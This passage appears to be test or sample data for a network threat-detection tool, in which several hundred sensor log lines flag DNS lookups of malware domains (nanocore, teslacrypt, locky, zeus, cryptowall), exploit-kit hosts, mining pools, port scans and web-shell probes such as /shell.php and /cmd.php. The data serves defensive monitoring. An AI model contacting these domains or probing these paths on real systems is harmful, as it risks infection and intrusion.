    '"2021-01-11 03:05:59.610014" r2d2 2.200.110.232 63925 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:06:00.657392" r2d2 2.200.105.226 57892 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:06:00.657387" r2d2 2.200.105.226 57892 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:06:00.657489" r2d2 2.200.105.226 57892 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:06:20.634578" r2d2 10.1.19.42 59504 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:06:30.699753" r2d2 2.200.110.232 64264 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:06:30.701334" r2d2 2.200.107.146 7872 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:06:30.734531" r2d2 2.200.110.233 65491 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:06:30.083763" r2d2 10.36.192.126 59568 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;9c8fbeff-b8d6-4cfe-bfac-f1f994df8c76;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:06:47.125221" r2d2 2.200.110.232 65124 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:06:47.177616" r2d2 2.200.110.233 63384 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:06:48.917789" r2d2 2.200.107.146 50475 185.159.198.150 53 UDP DNS ns1.frobbit.se "rogue dns (malicious)" (static)\n' +
    '"2021-01-11 03:06:48.941229" r2d2 2.200.107.146 47024 45.56.92.19 53 UDP DNS ns1.frobbit.se "rogue dns (malicious)" (static)\n' +
    '"2021-01-11 03:07:38.046517" r2d2 2.200.107.146 17619 97.74.105.26 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:07:38.045302" r2d2 2.200.110.233 64307 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:07:38.046125" r2d2 2.200.110.233 63325 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 03:07:39.395858" r2d2 2.200.107.146 10170 200.7.5.14 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:07:39.393931" r2d2 2.200.110.233 64928 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:07:40.742462" r2d2 2.200.110.232 63749 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:07:40.744419" r2d2 2.200.107.146 3335 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:07:40.779219" r2d2 2.200.110.233 64811 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:07:43.384852" r2d2 2.200.107.146 50424 194.62.183.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:07:43.382355" r2d2 2.200.110.232 64417 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:07:43.383443" r2d2 2.200.110.232 64067 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 03:08:26.559540" r2d2 2.200.110.233 65354 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 03:08:26.561556" r2d2 2.200.107.146 15083 54.226.255.149 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 03:08:40.074016" r2d2 10.3.160.42 30885 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:08:40.174083" r2d2 10.3.160.42 30885 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:08:40.275109" r2d2 10.3.160.42 30885 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:08:40.474030" r2d2 10.3.160.42 30885 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:08:40.773944" r2d2 10.3.160.42 30885 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:08:43.381558" r2d2 2.200.110.232 65098 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:08:43.383400" r2d2 2.200.107.146 31577 192.41.162.30 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:08:43.397411" r2d2 2.200.110.232 64624 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:08:47.677617" r2d2 2.200.110.233 64474 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:08:48.046538" r2d2 2.200.110.233 64669 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:08:48.047923" r2d2 2.200.107.146 62554 173.201.68.21 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:08:48.876783" r2d2 2.200.110.233 64305 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 03:08:50.789326" r2d2 2.200.110.233 64566 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:08:51.845733" r2d2 2.200.110.233 63942 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:08:51.847119" r2d2 2.200.107.146 17780 77.72.229.253 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:08:59.607773" r2d2 2.200.110.232 65017 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:08:59.618948" r2d2 2.200.110.232 64903 2.200.107.168 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:09:15.748223" r2d2 2.200.110.232 65211 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 03:09:26.990224" r2d2 182.117.107.71 48668 2.200.106.89 80 TCP UA "Hello, world" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:09:26.990232" r2d2 182.117.107.71 48668 10.110.24.18 80 TCP UA "Hello, world" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:09:43.396916" r2d2 2.200.110.232 65090 2.200.107.168 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 03:09:43.398895" r2d2 2.200.107.146 49711 192.54.112.30 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 03:09:58.146404" r2d2 2.200.110.232 64407 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:09:58.176506" r2d2 2.200.110.233 63938 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:09:59.620532" r2d2 2.200.110.232 65391 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:09:59.624928" r2d2 2.200.107.146 20368 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:09:59.908046" r2d2 2.200.110.233 49332 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:10:00.804221" r2d2 2.200.110.233 63470 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:09:58.694135" r2d2 101.109.242.42 57905 2.200.104.187 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:10:04.076478" r2d2 2.200.110.232 65524 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 03:09:59.191413" r2d2 101.109.242.42 57905 2.200.104.187 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:09:58.694142" r2d2 101.109.242.42 57905 2.200.104.187 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:10:03.386400" r2d2 101.109.242.42 57905 2.200.104.187 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:10:08.111396" r2d2 101.109.242.42 57905 2.200.104.187 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:10:17.571955" r2d2 101.109.242.42 57905 2.200.104.187 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:10:17.571953" r2d2 101.109.242.42 57905 2.200.104.187 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:10:25.214534" r2d2 2.200.107.146 8103 185.104.28.19 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 03:10:25.212994" r2d2 2.200.110.232 64357 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 03:10:23.623378" r2d2 178.17.174.14 47288 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; ShopperReports 3.0.489.0; SRS_IT_E8790575B576555536AB98; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:10:40.263758" r2d2 10.3.160.42 30886 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:10:40.363674" r2d2 10.3.160.42 30886 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:10:40.464336" r2d2 10.3.160.42 30886 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:10:40.663582" r2d2 10.3.160.42 30886 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:10:40.967174" r2d2 10.3.160.42 30886 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:10:41.363720" r2d2 10.3.160.42 30886 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:10:43.382901" r2d2 2.200.110.232 65432 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:10:43.401703" r2d2 2.200.110.232 63775 2.200.107.168 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:10:43.409451" r2d2 2.200.107.146 2310 217.115.6.76 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:10:59.606833" r2d2 2.200.110.232 64347 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:10:59.608176" r2d2 2.200.107.146 39916 97.74.108.9 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:10:59.611732" r2d2 2.200.110.232 63743 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 03:10:59.608786" r2d2 2.200.110.232 64502 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:10:59.618524" r2d2 2.200.110.232 64597 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:10:59.614025" r2d2 2.200.110.232 49434 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 03:10:59.610302" r2d2 2.200.107.146 47341 185.24.64.42 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:10:59.614567" r2d2 2.200.107.146 12286 192.35.51.30 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 03:10:59.623811" r2d2 2.200.110.232 64960 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:10:59.624956" r2d2 2.200.110.232 64389 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:10:59.621253" r2d2 2.200.110.232 49200 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:10:59.623640" r2d2 2.200.110.232 64546 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 03:10:59.627391" r2d2 2.200.107.146 52046 192.26.92.30 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:11:06.326353" r2d2 10.1.19.42 59507 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:11:07.784021" r2d2 2.200.110.233 64488 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:11:07.781425" r2d2 2.200.110.233 64402 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 03:11:07.784032" r2d2 2.200.110.233 64599 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:11:09.640375" r2d2 2.200.110.232 49413 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:11:10.099487" r2d2 2.200.110.232 65087 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:11:10.810484" r2d2 2.200.110.232 63720 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:11:10.811945" r2d2 2.200.107.146 17292 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:11:10.839636" r2d2 2.200.110.233 63377 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:11:16.141627" r2d2 10.36.192.126 59582 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;9c8fbeff-b8d6-4cfe-bfac-f1f994df8c76;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:11:14.312575" r2d2 101.109.242.42 57905 2.200.104.187 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:11:14.312567" r2d2 101.109.242.42 57905 2.200.104.187 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:11:40.216342" r2d2 10.36.192.126 59657 10.1.76.150 80 TCP UA "bfac (OSCE;12.0;5684;82175f2f-a04b-45f2-b621-7e826a622918;9c8fbeff-b8d6-4cfe-bfac-f1f994df8c76;iCRCHdler2.82.1117)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:11:59.607681" r2d2 2.200.110.232 65198 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:12:20.840451" r2d2 2.200.110.232 63542 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:12:20.842094" r2d2 2.200.107.146 15835 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:12:20.876029" r2d2 2.200.110.233 64794 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:12:22.412632" r2d2 2.200.105.226 59118 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:12:22.524775" r2d2 2.200.110.232 63705 2.200.107.168 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:12:22.951668" r2d2 2.200.107.146 44735 108.162.192.63 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:12:22.950067" r2d2 2.200.110.232 64596 2.200.107.168 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:12:59.623495" r2d2 2.200.110.232 64555 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:13:27.644088" r2d2 2.200.107.146 48012 37.209.198.12 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 03:13:27.642576" r2d2 2.200.110.232 63977 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 03:13:27.663778" r2d2 2.200.110.233 63241 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:13:27.680753" r2d2 2.200.110.233 65369 2.200.107.168 53 UDP DNS content-delivery.in "afrodita (malware)" (static)\n' +
    '"2021-01-11 03:13:27.790546" r2d2 2.200.110.233 64617 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:13:28.194482" r2d2 2.200.110.233 64637 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:13:30.892616" r2d2 2.200.110.232 49437 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:13:30.894378" r2d2 2.200.107.146 41392 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:13:32.000515" r2d2 2.200.108.59 11018,11020,11023,11024,11026,11028,11029,11031,11032,11033,11038,11039,11045,32808,32966,33098,33442,33482,33574,34682,34982,35264,35462,36082,36518,36572,36818,37080,37762,38104,38438,38638,38808,39586,40280,41112,41668,41694,41836,41893,41896,41897,42118,43104,43242,44184,44282,45098,45532,45888,46992,47140,47400,47624,48028,48029,48031,48032,48033,48614,48792,49310,49332,49342,49344,49742,49750,50350,51484,52082,52450,52500,53738,53784,54898,55218,55794,55796,56246,56560,56622,57180,57436,57668,57886,58390,58628,59498,59836,60036,60340,60354,60474,60516,60692,60882 77.53.81.105 21,5109,7612,8941,9298,10295,10930,11333,12615,15508,15899,16067,16554,16919,17498,17888,17925,20027,20168,21014,22833,23557,24661,24679,24814,25376,27362,27495,27596,27664,28699,29009,29160,31227,31970,32217,32444,34488,34897,35189,37416,38937,39090,39905,40299,41900,42481,43387,44980,45004,46384,48222,48398,48788,50548,51285,51798,54460,54815,54979,55244,55573,55642,57937,58531,58698,59189,60061,60798,60936,61578,61732,63478,63582,64365,64797 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:13:32.000512" r2d2 2.200.108.59 11019,11020,11023,11025,11026,11027,11030,11033,11034,11036,11037,11040,11041,11042,32966,33068,33442,33574,33998,34510,34834,35586,36082,36572,38104,39586,41030,41364,41464,41836,41895,42024,42118,43104,44184,45888,46092,46128,46384,46854,46992,47140,47274,48031,48033,48034,48792,49332,49344,49742,50448,50492,50530,52616,52784,53342,53406,53738,53784,54740,54898,55014,55794,56004,56140,56560,58034,59306,59464,60322,60340,60354,60516 77.53.81.105 21,5658,6378,7104,8011,8482,9745,9960,10295,10296,10930,11333,14053,15397,15899,16657,17498,17925,20027,20482,20844,21971,24679,24768,26220,26392,26847,28426,29160,31227,31970,34488,34897,35189,37775,39090,40128,40247,40299,41215,43387,43942,48398,48674,49484,54979,55244,55540,57776,58531,58698,60798,61593,63478,63582,64365 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:13:32.000511" r2d2 2.200.108.59 11018,11021,11022,11025,11028,11031,11034,11035,11036,11039,11041,11042,11043,33068,33098,34194,34510,34834,34982,35586,35812,36112,37358,37680,37762,38438,38582,38676,38808,40764,41112,41668,41694,41893,41894,41896,41898,42024,42346,43800,44426,44484,44674,45098,45530,46092,46128,46436,46850,46854,47274,47400,47624,47892,48028,48030,48034,48322,48614,49310,50492,51298,51484,52450,52616,52628,52784,53148,53406,54284,55062,55962,56752,57180,57436,57886,58034,58390,59464,59498,59836,60474,60692,60882 77.53.81.105 21,5109,5658,6378,7104,7492,7612,9600,9745,10296,10766,14053,15092,16116,16657,17888,19839,20512,20670,21971,22833,23557,24493,24661,24768,24814,25376,26847,27007,27362,27495,28426,28472,28699,29009,29621,37416,39346,40247,40325,41001,41272,41438,43942,44980,45004,46332,46384,47640,51798,54401,54482,54662,54815,55540,55642,55792,57937,59495,60936,61578,61593,61732,64797,65440 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:13:43.382272" r2d2 2.200.110.232 64473 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:14:18.757305" r2d2 10.43.193.193 51044 10.1.194.234 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:14:18.762119" r2d2 2.200.110.233 55652 2.200.107.168 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:14:18.763590" r2d2 2.200.107.146 30278 205.251.192.60 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:14:18.783270" r2d2 2.200.110.232 53538 2.200.107.168 53 UDP DNS hahofaba.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:14:40.650019" r2d2 10.3.160.42 30888 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:14:40.743104" r2d2 10.3.160.42 30888 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:14:40.844909" r2d2 10.3.160.42 30888 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:14:40.938082" r2d2 2.200.110.232 65193 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:14:40.974182" r2d2 2.200.110.233 64424 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:14:40.939999" r2d2 2.200.107.146 10751 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:14:41.043554" r2d2 10.3.160.42 30888 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:14:41.345876" r2d2 10.3.160.42 30888 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:14:42.843411" r2d2 10.3.160.42 30888 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:14:49.465524" r2d2 103.90.203.152 50292 2.200.107.193 80 TCP URL (2.200.107.193)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:14:45.689403" r2d2 10.1.19.42 59509 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:14:57.850342" r2d2 103.90.203.152 52754 2.200.107.193 80 TCP URL (2.200.107.193)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:14:57.850401" r2d2 103.90.203.152 52754 10.110.24.21 80 TCP URL (2.200.107.193)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:14:57.850398" r2d2 103.90.203.152 52754 2.200.107.193 80 TCP URL (2.200.107.193)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:14:59.490882" r2d2 103.90.203.152 53260 2.200.107.193 80 TCP URL (2.200.107.193)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:14:59.490883" r2d2 103.90.203.152 53260 2.200.107.193 80 TCP URL (2.200.107.193)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:14:59.612547" r2d2 2.200.110.232 63857 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:14:59.614371" r2d2 2.200.107.146 47447 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:14:59.893726" r2d2 103.90.203.152 53396 2.200.107.193 80 TCP URL (2.200.107.193)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:15:21.000802" r2d2 103.90.203.152 59615 2.200.107.193 80 TCP URL (2.200.107.193/images/stories)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:15:21.001115" r2d2 103.90.203.152 59615 10.110.24.21 80 TCP URL (2.200.107.193/images/stories)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:15:21.001112" r2d2 103.90.203.152 59615 2.200.107.193 80 TCP URL (2.200.107.193/images/stories)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:15:30.078894" r2d2 2.200.104.184 65317 205.251.193.194 53 UDP DNS ofhappinyer.com "pushbug (malicious)" (static)\n' +
    '"2021-01-11 03:15:30.093349" r2d2 2.200.104.184 61114 205.251.193.194 53 UDP DNS ofhappinyer.com "pushbug (malicious)" (static)\n' +
    '"2021-01-11 03:15:42.653305" r2d2 10.1.81.47 53159 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 03:15:42.656138" r2d2 2.200.107.146 55443 198.41.222.173 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 03:15:42.653383" r2d2 10.1.81.47 53159 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 03:15:43.393950" r2d2 2.200.110.232 64539 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:15:43.393948" r2d2 2.200.110.232 65037 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 03:15:43.395673" r2d2 2.200.107.146 33371 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:15:43.396283" r2d2 2.200.107.146 34059 192.12.94.30 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 03:15:43.396912" r2d2 2.200.110.232 64830 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:15:47.127722" r2d2 103.90.203.152 3094 2.200.107.193 80 TCP URL (2.200.107.193)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:15:47.958703" r2d2 2.200.110.233 63644 2.200.107.169 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 03:15:50.978200" r2d2 2.200.110.233 65486 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:16:07.211763" r2d2 2.200.110.232 64466 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
